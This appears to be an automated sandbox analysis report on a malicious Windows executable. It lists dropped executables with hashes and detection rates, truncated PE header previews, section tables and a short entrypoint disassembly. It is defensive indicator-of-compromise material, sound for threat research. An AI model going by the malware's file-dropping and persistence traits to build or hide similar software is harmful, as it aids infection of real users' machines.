                                                                                  SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                  SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                  SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                  Malicious:true
                                                                                  Reputation:unknown
                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                  C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):905216
                                                                                  Entropy (8bit):7.399713113456654
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                  MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                  SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                  SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                  SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                   • Antivirus: Metadefender, Detection: 34%
                                                                                  • Antivirus: ReversingLabs, Detection: 77%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\6FB4.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):373760
                                                                                  Entropy (8bit):6.990411328206368
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:GszrgLWpo6b1OmohXrIdF5SpBLE4Hy+74YOAnF3YFUGFHWEZq:Gsgq3b1Omsb7pBLEazsYOSGFHFHW
                                                                                  MD5:8B239554FE346656C8EEF9484CE8092F
                                                                                  SHA1:D6A96BE7A61328D7C25D7585807213DD24E0694C
                                                                                  SHA-256:F96FB1160AAAA0B073EF0CDB061C85C7FAF4EFE018B18BE19D21228C7455E489
                                                                                  SHA-512:CE9945E2AF46CCD94C99C36360E594FF5048FE8E146210CF8BA0D71C34CC3382B0AA252A96646BBFD57A22E7A72E9B917E457B176BCA2B12CC4F662D8430427D
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                   • Antivirus: Metadefender, Detection: 29%
                                                                                  • Antivirus: ReversingLabs, Detection: 81%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..U(...(...(...6.).1...6.?.W....l..+...(.......6.8.....6.(.)...6.-.)...Rich(...........PE..L...a.R`.....................v......@.............@..................................&..........................................(........{...................0..........................................@...............8............................text............................... ..`.data...............................@....gizi...............................@....bur................................@....wob................................@....rsrc....{.......|..................@..@.reloc..4F...0...H...l..............@..B................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\8783.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3576320
                                                                                  Entropy (8bit):7.9976863291960605
                                                                                  Encrypted:true
                                                                                  SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
                                                                                  MD5:5800952B83AECEFC3AA06CCB5B29A4C2
                                                                                  SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
                                                                                  SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
                                                                                  SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......!7.....................................|.N. .... M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........x+...P......................@.............1.........................@....rsrc........ M......L0.............@....28gybOo......N.......1.............@....adata.......pS.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\9334.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):301056
                                                                                  Entropy (8bit):5.192330972647351
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                                  MD5:277680BD3182EB0940BC356FF4712BEF
                                                                                  SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                                  SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                                  SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                   • Antivirus: Metadefender, Detection: 46%
                                                                                  • Antivirus: ReversingLabs, Detection: 77%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\9DFA.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3576320
                                                                                  Entropy (8bit):7.9976863291960605
                                                                                  Encrypted:true
                                                                                  SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
                                                                                  MD5:5800952B83AECEFC3AA06CCB5B29A4C2
                                                                                  SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
                                                                                  SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
                                                                                  SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......!7.....................................|.N. .... M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........x+...P......................@.............1.........................@....rsrc........ M......L0.............@....28gybOo......N.......1.............@....adata.......pS.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\B0F7.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):905216
                                                                                  Entropy (8bit):7.399713113456654
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                  MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                  SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                  SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                  SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                   • Antivirus: Metadefender, Detection: 34%
                                                                                  • Antivirus: ReversingLabs, Detection: 77%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\C7FA.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:MS-DOS executable
                                                                                  Category:dropped
                                                                                  Size (bytes):557664
                                                                                  Entropy (8bit):7.687250283474463
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
                                                                                  MD5:6ADB5470086099B9169109333FADAB86
                                                                                  SHA1:87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
                                                                                  SHA-256:B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
                                                                                  SHA-512:D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....5...............0..$...*........... ...`....@..........................0.......@....@..................................p..........P)...........................................................................................................idata...`.............................`.pdata.......p......................@....rsrc...P)......0...................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................g..L.r9..v9.<iP.hL[Kc...",..
                                                                                  C:\Users\user\AppData\Local\Temp\DB31.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):322560
                                                                                  Entropy (8bit):6.7095586688781985
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:nOOJ91Tu9Vc1ye3MKfa+zqKnvDfsxa6hkZC15O5Pdz:nRJ91TYWym1ffzvD36YC15E
                                                                                  MD5:6009BCB680BE6C0F656AA157E56423DC
                                                                                  SHA1:FA9BA68D6B2026683BD392259BA26D7D468AEA7E
                                                                                  SHA-256:5C037C7C1338CF54A9D1E81B74BB4AD003E1A254069A03499426EC1600A748D9
                                                                                  SHA-512:5ECE7D9531051C951DFA0CF9533AB778B468EBE3EBE5D7B8A934D408E69BE910F244C59810A5FB41376B1CA7E5EB78DBF514032354EF047D00F043E2A17795E9
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L...9.-`..........................................@.........................................................................$...(...................................................................0...@...............D............................text............................... ..`.data...............................@....gave...............................@....noduf..............................@....gafal..............................@....rsrc................ ..............@..@.reloc..dF.......H..................@..B........................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\E748.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):319488
                                                                                  Entropy (8bit):6.68576465213566
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:tFaYhNulUB/eDlvaOA2tm9gogt8nfF9TJwnGbQ5+:tFnhNulSEvYcOgonTTJwEQ5
                                                                                  MD5:7C64BD730B6C9565F287278834A33618
                                                                                  SHA1:0D36AF541B32F19FD18E7FDA3F55440C97D22407
                                                                                  SHA-256:6CB775A7C9B0CF8BA308029DC623E1DE6D17CB2AB6B7EBBBD9C16BFCAA55EFE8
                                                                                  SHA-512:A8A304220B0CCA1058449511BDE2973E90F9237BE36A909C070AF2C0C9B6D340DB21A0287BCDFA9D333C61FCA1A7D7C95E4CDF4288C8D192FD681ADA4F322C55
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L......`.........................................@.............................................................................(...................................................................0...@...............D............................text...d........................... ..`.data...............................@....sop................................@....fob................................@....hasajo.............................@....rsrc...............................@..@.reloc..ZF.......H..................@..B........................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\F65C.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:modified
                                                                                  Size (bytes):537088
                                                                                  Entropy (8bit):5.840438491186833
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                                  MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                                  SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                                  SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                                  SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:unknown
                                                                                  C:\Users\user\AppData\Local\Temp\gecrjwsv.exe
                                                                                  Process:C:\Users\user\AppData\Local\Temp\E748.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):11673600
                                                                                  Entropy (8bit):3.816723429746929
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:OFaYhNulUB/eDlvaOA2tm9gogt8nfF9TJwnGbQ5+:OFnhNulSEvYcOgonTTJwEQ5
                                                                                  MD5:6DD4312F6A305B72C1A1948F27068190
                                                                                  SHA1:1A76D5EB3D9CB7628B746A2C649DC6CCC03EACAC
                                                                                  SHA-256:DD1F717452D1875BF3AF9FDE8D4AC06514FF9B05E58C579E6AD5F2B0A5F4D51F
                                                                                  SHA-512:BC1742225A9FC18856424423C062E7CCA7CA28C0232F23FBF78661898144D92EA9A2EC6FF4EC91BCA50B69C2B33CB2F43E059A6AFAB8B0BFA86517A8BBA914C5
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:unknown
                                                                                  C:\Users\user\AppData\Roaming\rifsswe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):320512
                                                                                  Entropy (8bit):6.691089236822667
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:0H4/g0hr5Y3eofIaxJGgOe8nQGo/GOEEmBbejvf:0Y4OuJI8pd8a/GAmBbe
                                                                                  MD5:888928D26BD03678AFD9FED0D92F6FC9
                                                                                  SHA1:37723B453FD3133C01E7A43892B73C6580EDD164
                                                                                  SHA-256:1CF27AB77A771FF942B1E2947856844FBAB4991CF87ACA618968445B5C5D706D
                                                                                  SHA-512:7007BA06A902089229F384650DE75ABCEC8740501F3E6A12F421951689F932582DD5749234B8B635D074B3BDD1061AC786449DD582BDAF840FBDEF9BF2BB76F2
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Reputation:unknown
                                                                                  C:\Users\user\AppData\Roaming\rifsswe:Zone.Identifier
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):26
                                                                                  Entropy (8bit):3.95006375643621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                  Malicious:true
                                                                                  Reputation:unknown
                                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                                  C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe (copy)
                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):11673600
                                                                                  Entropy (8bit):3.816723429746929
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:OFaYhNulUB/eDlvaOA2tm9gogt8nfF9TJwnGbQ5+:OFnhNulSEvYcOgonTTJwEQ5
                                                                                  MD5:6DD4312F6A305B72C1A1948F27068190
                                                                                  SHA1:1A76D5EB3D9CB7628B746A2C649DC6CCC03EACAC
                                                                                  SHA-256:DD1F717452D1875BF3AF9FDE8D4AC06514FF9B05E58C579E6AD5F2B0A5F4D51F
                                                                                  SHA-512:BC1742225A9FC18856424423C062E7CCA7CA28C0232F23FBF78661898144D92EA9A2EC6FF4EC91BCA50B69C2B33CB2F43E059A6AFAB8B0BFA86517A8BBA914C5
                                                                                  Malicious:true
                                                                                  Reputation:unknown
                                                                                  C:\Windows\appcompat\Programs\Amcache.hve
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                  Category:dropped
                                                                                  Size (bytes):1572864
                                                                                  Entropy (8bit):4.236352523388576
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:qCkTwSoKc2tIokbtAz9HlFkEwQVj9jNoD+d+qnG3miIAAQVi:nkTwSoKc2tjkbt23w
                                                                                  MD5:9559FE849D365085D314F82D67F2A35E
                                                                                  SHA1:CC18BA14948462C90BF7D9A82DF399FFDCD009E9
                                                                                  SHA-256:095A6F3AC520C2FCA853EF867B55E04B72221523137DE58C8882C4F38117BA4E
                                                                                  SHA-512:BBDABC4E7D8B64576FCFE31D1438E6A1C854772AE2EB0633C76676D72AB992B1F77C097DCEFEF9FBE4C5D9FB92EBAAF5D576F316A02180FD08E33A4C20794BCD
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):3.3460374001719013
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:jjC5K5gBv4KgnVVeeDzeT1NKZtjbT8GxwQ3zeDM8y:P8KUg/eeDzeJNYtj0GxwQiM8
                                                                                  MD5:B70CC5CA4245A261BB82B3C28B555A61
                                                                                  SHA1:935103E48FCA22FF96AED36458371D966DA4594B
                                                                                  SHA-256:FCB60B171A00416847309E79408CA0FC4AB0D093257417FD4C3BAB1BB9EF4D8D
                                                                                  SHA-512:45EBF9B3A9848A4F94F04CF1B055ABDB90A166C286179DB9E394900EED75E7DF19368B83CFE63B0902FA49511706E057859287756D7D735D4CEDD57710A8270E
                                                                                  Malicious:false
                                                                                  Reputation:unknown

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):6.691089236822667
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:tijXCZsbGe.exe
                                                                                  File size:320512
                                                                                  MD5:888928d26bd03678afd9fed0d92f6fc9
                                                                                  SHA1:37723b453fd3133c01e7a43892b73c6580edd164
                                                                                  SHA256:1cf27ab77a771ff942b1e2947856844fbab4991cf87aca618968445b5c5d706d
                                                                                  SHA512:7007ba06a902089229f384650de75abcec8740501f3e6a12f421951689f932582dd5749234b8b635d074b3bdd1061ac786449dd582bdaf840fbdef9bf2bb76f2
                                                                                  SSDEEP:6144:0H4/g0hr5Y3eofIaxJGgOe8nQGo/GOEEmBbejvf:0Y4OuJI8pd8a/GAmBbe

                                                                                  File Icon

                                                                                  Icon Hash:c8d0d8e0f8e0f0e8

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x41b7b0
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                  Time Stamp:0x60A45518 [Wed May 19 00:00:24 2021 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:0
                                                                                  File Version Major:5
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:80fec6fca6f81033220e34b44810dbfd

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  mov edi, edi
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  call 00007FB310BC2FBBh
                                                                                  call 00007FB310BB5FC6h
                                                                                  pop ebp
                                                                                  ret
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  mov edi, edi
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push FFFFFFFEh
                                                                                  push 0043DDA8h
                                                                                  push 0041E990h
                                                                                  mov eax, dword ptr fs:[00000000h]
                                                                                  push eax
                                                                                  add esp, FFFFFF94h
                                                                                  push ebx
                                                                                  push esi
                                                                                  push edi
                                                                                  mov eax, dword ptr [00440354h]
                                                                                  xor dword ptr [ebp-08h], eax
                                                                                  xor eax, ebp
                                                                                  push eax
                                                                                  lea eax, dword ptr [ebp-10h]
                                                                                  mov dword ptr fs:[00000000h], eax
                                                                                  mov dword ptr [ebp-18h], esp
                                                                                  mov dword ptr [ebp-70h], 00000000h
                                                                                  mov dword ptr [ebp-04h], 00000000h
                                                                                  lea eax, dword ptr [ebp-60h]
                                                                                  push eax
                                                                                  call dword ptr [004010A0h]
                                                                                  mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                  jmp 00007FB310BB5FD8h
                                                                                  mov eax, 00000001h
                                                                                  ret
                                                                                  mov esp, dword ptr [ebp-18h]
                                                                                  mov dword ptr [ebp-78h], 000000FFh
                                                                                  mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                  mov eax, dword ptr [ebp-78h]
                                                                                  jmp 00007FB310BB6107h
                                                                                  mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                  call 00007FB310BB6144h
                                                                                  mov dword ptr [ebp-6Ch], eax
                                                                                  push 00000001h
                                                                                  call 00007FB310BC399Ah
                                                                                  add esp, 04h
                                                                                  test eax, eax
                                                                                  jne 00007FB310BB5FBCh
                                                                                  push 0000001Ch
                                                                                  call 00007FB310BB60FCh
                                                                                  add esp, 04h
                                                                                  call 00007FB310BBF0A4h
                                                                                  test eax, eax
                                                                                  jne 00007FB310BB5FBCh
                                                                                  push 00000010h

Rich Headers

Programming Language:
• [ C ] VS2008 build 21022
• [IMP] VS2005 build 50727
• [ASM] VS2008 build 21022
• [LNK] VS2008 build 21022
• [RES] VS2008 build 21022
• [C++] VS2008 build 21022

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x3e4d4          0x28          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x150000         0x83b8        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x159000         0x1e04        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x1390           0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x9130           0x40          .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x1000           0x344         .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name      Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity   File Type  Entropy        Characteristics
.text     0x1000           0x3e844       0x3ea00   False     0.582655002495    data       6.96511151774  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data     0x40000          0x10c988      0x1800    False     0.340657552083    data       3.46253582216  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.koyalef  0x14d000         0x5           0x200     False     0.02734375        data       0.0            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.bopi     0x14e000         0xea          0x200     False     0.02734375        data       0.0            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.cegem    0x14f000         0xd93         0xe00     False     0.00697544642857  data       0.0            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc     0x150000         0x83b8        0x8400    False     0.597005208333    data       5.81594555385  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc    0x159000         0x465a        0x4800    False     0.346625434028    data       3.69106106097  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
